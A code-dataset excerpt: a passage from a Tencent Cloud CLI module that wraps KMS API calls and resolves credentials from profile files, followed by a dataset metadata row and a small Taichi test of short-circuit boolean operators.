def doUnbindCloudResource(args, parsed_globals):
    """Call the KMS UnbindCloudResource API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an UnbindCloudResourceRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.UnbindCloudResourceRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.UnbindCloudResource(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableKeyRotation(args, parsed_globals):
    """Call the KMS EnableKeyRotation API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an EnableKeyRotationRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.EnableKeyRotationRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.EnableKeyRotation(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateWhiteBoxKey(args, parsed_globals):
    """Call the KMS CreateWhiteBoxKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into a CreateWhiteBoxKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateWhiteBoxKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.CreateWhiteBoxKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableWhiteBoxKey(args, parsed_globals):
    """Call the KMS EnableWhiteBoxKey API with *args* and print the formatted response.

    args: dict of request parameters, serialized into an EnableWhiteBoxKeyRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, ...).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # 60s default request timeout unless overridden via the CLI.
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.EnableWhiteBoxKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.EnableWhiteBoxKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads rejects bytes on python 3.3; decode first.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableKey(args, parsed_globals):
    """CLI entry point for the KMS ``EnableKey`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as an ``EnableKeyRequest``, and prints the JSON
    response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.EnableKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.EnableKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDecrypt(args, parsed_globals):
    """CLI entry point for the KMS ``Decrypt`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``DecryptRequest``, and prints the JSON
    response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DecryptRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.Decrypt(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKeys(args, parsed_globals):
    """CLI entry point for the KMS ``DescribeKeys`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``DescribeKeysRequest``, and prints the
    JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeKeysRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeKeys(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxServiceStatus(args, parsed_globals):
    """CLI entry point for the KMS ``DescribeWhiteBoxServiceStatus`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``DescribeWhiteBoxServiceStatusRequest``,
    and prints the JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeWhiteBoxServiceStatusRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeWhiteBoxServiceStatus(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUpdateKeyDescription(args, parsed_globals):
    """CLI entry point for the KMS ``UpdateKeyDescription`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as an ``UpdateKeyDescriptionRequest``, and
    prints the JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.UpdateKeyDescriptionRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.UpdateKeyDescription(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCancelKeyArchive(args, parsed_globals):
    """CLI entry point for the KMS ``CancelKeyArchive`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``CancelKeyArchiveRequest``, and prints
    the JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CancelKeyArchiveRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.CancelKeyArchive(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxDecryptKey(args, parsed_globals):
    """CLI entry point for the KMS ``DescribeWhiteBoxDecryptKey`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``DescribeWhiteBoxDecryptKeyRequest``, and
    prints the JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeWhiteBoxDecryptKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeWhiteBoxDecryptKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetRegions(args, parsed_globals):
    """CLI entry point for the KMS ``GetRegions`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``GetRegionsRequest``, and prints the
    JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.GetRegionsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.GetRegions(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doVerifyByAsymmetricKey(args, parsed_globals):
    """CLI entry point for the KMS ``VerifyByAsymmetricKey`` API action.

    Resolves global CLI parameters, builds SDK credentials and a client
    profile, sends *args* as a ``VerifyByAsymmetricKeyRequest``, and
    prints the JSON response through ``FormatOutput``.

    :param args: dict of action-specific parameters from the command line
    :param parsed_globals: dict of global CLI options (profile, region, ...)
    """
    g_param = parse_global_arg(parsed_globals)

    # Credentials come from the merged CLI/profile/environment parameters.
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    # Default request timeout is 60 seconds unless overridden on the CLI.
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
    # Append a CLI marker to the SDK version string sent with requests.
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.VerifyByAsymmetricKeyRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.VerifyByAsymmetricKey(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # to_json_string may return bytes on some interpreters (original
        # note: python3.3); decode before parsing.
        json_obj = json.loads(result.decode('utf-8'))
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
# Maps supported API version string -> SDK client module for KMS.
CLIENT_MAP = {
    "v20190118": kms_client_v20190118,
}

# Maps supported API version string -> SDK request/response model module.
MODELS_MAP = {
    "v20190118": models_v20190118,
}

# Maps CLI action name -> handler function that executes that KMS action.
ACTION_MAP = {
    "DeleteImportedKeyMaterial": doDeleteImportedKeyMaterial,
    "Encrypt": doEncrypt,
    "EnableWhiteBoxKeys": doEnableWhiteBoxKeys,
    "UpdateAlias": doUpdateAlias,
    "DeleteWhiteBoxKey": doDeleteWhiteBoxKey,
    "ImportKeyMaterial": doImportKeyMaterial,
    "GetPublicKey": doGetPublicKey,
    "DisableKey": doDisableKey,
    "GenerateDataKey": doGenerateDataKey,
    "AsymmetricSm2Decrypt": doAsymmetricSm2Decrypt,
    "SignByAsymmetricKey": doSignByAsymmetricKey,
    "CancelKeyDeletion": doCancelKeyDeletion,
    "GetKeyRotationStatus": doGetKeyRotationStatus,
    "DescribeWhiteBoxKeyDetails": doDescribeWhiteBoxKeyDetails,
    "BindCloudResource": doBindCloudResource,
    "DisableKeys": doDisableKeys,
    "ArchiveKey": doArchiveKey,
    "GetServiceStatus": doGetServiceStatus,
    "EncryptByWhiteBox": doEncryptByWhiteBox,
    "ListAlgorithms": doListAlgorithms,
    "ReEncrypt": doReEncrypt,
    "ListKeys": doListKeys,
    "GenerateRandom": doGenerateRandom,
    "OverwriteWhiteBoxDeviceFingerprints": doOverwriteWhiteBoxDeviceFingerprints,
    "CreateKey": doCreateKey,
    "DescribeWhiteBoxKey": doDescribeWhiteBoxKey,
    "GetParametersForImport": doGetParametersForImport,
    "DisableWhiteBoxKeys": doDisableWhiteBoxKeys,
    "ListKeyDetail": doListKeyDetail,
    "AsymmetricRsaDecrypt": doAsymmetricRsaDecrypt,
    "DisableKeyRotation": doDisableKeyRotation,
    "DisableWhiteBoxKey": doDisableWhiteBoxKey,
    "EnableKeys": doEnableKeys,
    "ScheduleKeyDeletion": doScheduleKeyDeletion,
    "DescribeWhiteBoxDeviceFingerprints": doDescribeWhiteBoxDeviceFingerprints,
    "DescribeKey": doDescribeKey,
    "UnbindCloudResource": doUnbindCloudResource,
    "EnableKeyRotation": doEnableKeyRotation,
    "CreateWhiteBoxKey": doCreateWhiteBoxKey,
    "EnableWhiteBoxKey": doEnableWhiteBoxKey,
    "EnableKey": doEnableKey,
    "Decrypt": doDecrypt,
    "DescribeKeys": doDescribeKeys,
    "DescribeWhiteBoxServiceStatus": doDescribeWhiteBoxServiceStatus,
    "UpdateKeyDescription": doUpdateKeyDescription,
    "CancelKeyArchive": doCancelKeyArchive,
    "DescribeWhiteBoxDecryptKey": doDescribeWhiteBoxDecryptKey,
    "GetRegions": doGetRegions,
    "VerifyByAsymmetricKey": doVerifyByAsymmetricKey,
}

# API versions this module supports; validated by parse_global_arg().
AVAILABLE_VERSION_LIST = [
    "v20190118",
]
def action_caller():
    """Return the mapping of CLI action names to their handler functions."""
    actions = ACTION_MAP
    return actions
def parse_global_arg(parsed_globals):
    """Resolve global CLI parameters against profile files and environment.

    Fills any ``None`` values in *parsed_globals* from the per-profile
    ``~/.tccli/<profile>.configure`` / ``<profile>.credential`` files (and,
    when no profile was explicitly given, from environment variables), then
    resolves and validates the API version and endpoint.

    :param parsed_globals: dict of global CLI options; mutated in place
    :return: the same dict, fully populated
    :raises ConfigurationError: on malformed config files or missing
        required credential/region/output values
    """
    g_param = parsed_globals

    # Track whether the user explicitly supplied a profile; env-var
    # overrides below only apply when they did not.
    is_exist_profile = True
    if not parsed_globals["profile"]:
        is_exist_profile = False
        g_param["profile"] = "default"

    configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
    is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
    is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")

    conf = {}
    cred = {}

    if is_conf_exist:
        conf = Utils.load_json_msg(conf_path)

    if is_cred_exist:
        cred = Utils.load_json_msg(cred_path)

    # Both files must parse to JSON objects (dicts) to be usable.
    if not (isinstance(conf, dict) and isinstance(cred, dict)):
        raise ConfigurationError(
            "file: %s or %s is not json format"
            % (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))

    # Token is optional in the credential file; default it to None.
    if OptionsDefine.Token not in cred:
        cred[OptionsDefine.Token] = None

    # With no explicit profile, environment variables override file values.
    if not is_exist_profile:
        if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
            cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
            cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
            cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)

        if os.environ.get(OptionsDefine.ENV_REGION):
            conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)

    # Backfill any still-unset globals: credentials come from the
    # credential file, region/output from the configure file. A value
    # missing from both the CLI and its source file is a hard error.
    for param in g_param.keys():
        if g_param[param] is None:
            if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
                if param in cred:
                    g_param[param] = cred[param]
                else:
                    raise ConfigurationError("%s is invalid" % param)
            elif param in [OptionsDefine.Region, OptionsDefine.Output]:
                if param in conf:
                    g_param[param] = conf[param]
                else:
                    raise ConfigurationError("%s is invalid" % param)

    try:
        # CLI-supplied version wins; otherwise use the per-service ("kms")
        # section of the configure file. "2019-01-18" becomes "v20190118".
        if g_param[OptionsDefine.ServiceVersion]:
            g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
        else:
            version = conf["kms"][OptionsDefine.Version]
            g_param[OptionsDefine.Version] = "v" + version.replace('-', '')

        if g_param[OptionsDefine.Endpoint] is None:
            g_param[OptionsDefine.Endpoint] = conf["kms"][OptionsDefine.Endpoint]
    except Exception as err:
        # Any lookup failure here means the config file is incomplete/broken.
        raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))

    if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
        raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))

    return g_param
| 43.350131 | 105 | 0.725766 | 7,534 | 66,239 | 6.141625 | 0.036103 | 0.084934 | 0.244322 | 0.056753 | 0.862527 | 0.858702 | 0.857146 | 0.85559 | 0.853558 | 0.805818 | 0 | 0.008507 | 0.165884 | 66,239 | 1,527 | 106 | 43.37852 | 0.828962 | 0.007714 | 0 | 0.72929 | 0 | 0 | 0.038492 | 0.003319 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037722 | false | 0 | 0.017751 | 0.00074 | 0.056953 | 0.005917 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
40e45998eb95b018fd7214ac59f799db254bc074 | 921 | py | Python | tests/python/test_short_circuit.py | kxxt/taichi | 15f39b79c258080f1e34fcbdc29646d9ced0a4fe | [
"MIT"
] | 11,699 | 2020-01-09T03:02:46.000Z | 2022-03-31T20:59:08.000Z | tests/python/test_short_circuit.py | kxxt/taichi | 15f39b79c258080f1e34fcbdc29646d9ced0a4fe | [
"MIT"
] | 3,589 | 2020-01-09T03:18:25.000Z | 2022-03-31T19:06:42.000Z | tests/python/test_short_circuit.py | kxxt/taichi | 15f39b79c258080f1e34fcbdc29646d9ced0a4fe | [
"MIT"
] | 1,391 | 2020-01-09T03:02:54.000Z | 2022-03-31T08:44:29.000Z | import taichi as ti
@ti.test(debug=True, short_circuit_operators=True)
def test_and_shorted():
a = ti.field(ti.i32, shape=10)
@ti.func
def explode() -> ti.i32:
return a[-1]
@ti.kernel
def func() -> ti.i32:
return False and explode()
assert func() == 0
@ti.test(debug=True, short_circuit_operators=True)
def test_and_not_shorted():
@ti.kernel
def func() -> ti.i32:
return True and False
assert func() == 0
@ti.test(debug=True, short_circuit_operators=True)
def test_or_shorted():
a = ti.field(ti.i32, shape=10)
@ti.func
def explode() -> ti.i32:
return a[-1]
@ti.kernel
def func() -> ti.i32:
return True or explode()
assert func() == 1
@ti.test(debug=True, short_circuit_operators=True)
def test_or_not_shorted():
@ti.kernel
def func() -> ti.i32:
return False or True
assert func() == 1
